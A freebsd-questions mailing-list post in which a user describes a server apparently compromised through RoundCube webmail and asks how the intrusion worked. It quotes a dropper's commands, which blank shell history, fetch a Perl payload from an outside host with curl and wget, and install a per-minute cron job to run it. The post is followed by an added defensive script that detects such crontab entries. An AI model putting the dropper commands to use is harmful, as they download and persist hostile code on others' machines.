Colin Brace wrote:
>
> ahhhhh, another directory found in /tmp with files written by www called
> .bash/ Contents here:
>
> http://silenceisdefeat.com/~cbrace/www_badstuff-3.gz
>

Apropos of the contents of the above, a correspondent writes:
[...]

running 'strings' on /tmp/owned will show

"HISTFILE=/dev/null
cd /tmp;curl -s -O http://www.tirnaveni.org/tmpfile 2>&1 >/dev/null
cd /tmp;wget -b http://www.tirnaveni.org/tmpfile 2>&1 >/dev/null
echo '*/1 * * * * perl /tmp/tmpfile' >cron.job
crontab cron.job
rm -rf cron.job
chmod 0100 /tmp/tmpfile 2>&1 >/dev/null
perl /tmp/tmpfile 2>&1 >/dev/null"

[...]

So this would be the original mischief-maker.

Just out of curiosity, can someone explain to me in basic terms how an intruder exploits a vulnerability such as apparently existed on my system (the RoundCube webmail package was apparently the culprit) to place the binary file "owned" in /tmp and execute it?

Thanks

-----
Colin Brace
Amsterdam
http://lim.nl
--
View this message in context: http://www.nabble.com/what-www-perl-script-is-running--tp25112050p25167487.html
Sent from the freebsd-questions mailing list archive at Nabble.com.
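The strings output quoted above installs a crontab entry (`*/1 * * * * perl /tmp/tmpfile`) for the web server user, so one cleanup check is to look for crontab entries that reference a world-writable directory. The script below is an added example, not part of the original message: the function names and the sample crontab are constructed for illustration, and /var/cron/tabs is assumed as the per-user crontab directory (the FreeBSD default).

```shell
#!/bin/sh
# Added example, not from the thread: flag crontab entries that reference a
# world-writable directory, the persistence pattern in the strings output.

# Read crontab text on stdin; print "<label>: <entry>" for each flagged line.
flag_tmp_cron() {
    awk -v label="$1" '
        /^[ \t]*(#|$)/ { next }      # skip comments and blank lines
        # /tmp, /var/tmp or /dev/shm as a whole path component, so that
        # /home/www/tmp/out and /tmpfile do not match
        $0 ~ "(^|[^A-Za-z0-9_./-])/(tmp|var/tmp|dev/shm)(/|[^A-Za-z0-9_.-]|$)" {
            print label ": " $0
        }'
}

# Scan every per-user crontab in a directory (FreeBSD: /var/cron/tabs, readable
# by root only). Returns 1 if any entry was flagged, 0 otherwise.
scan_cron_dir() {
    dir=${1:-/var/cron/tabs}
    hits=0
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        out=$(flag_tmp_cron "$(basename "$f")" < "$f")
        [ -z "$out" ] || { printf '%s\n' "$out"; hits=1; }
    done
    return "$hits"
}

# Constructed sample: one entry of the kind the dropper installs, plus
# benign lines that must not be flagged.
sample_crontab() {
    cat <<'EOF'
# old entry: */5 * * * * /tmp/cleanup
MAILTO=""
*/1 * * * * perl /tmp/tmpfile
0 3 * * * /usr/local/bin/backup.sh /home/www/tmp/out
@reboot sh /var/tmp/job.sh
EOF
}

sample_crontab | flag_tmp_cron www
```

On a live system, run `scan_cron_dir` as root; a flagged entry is a lead to inspect, since legitimate jobs occasionally reference /tmp as well.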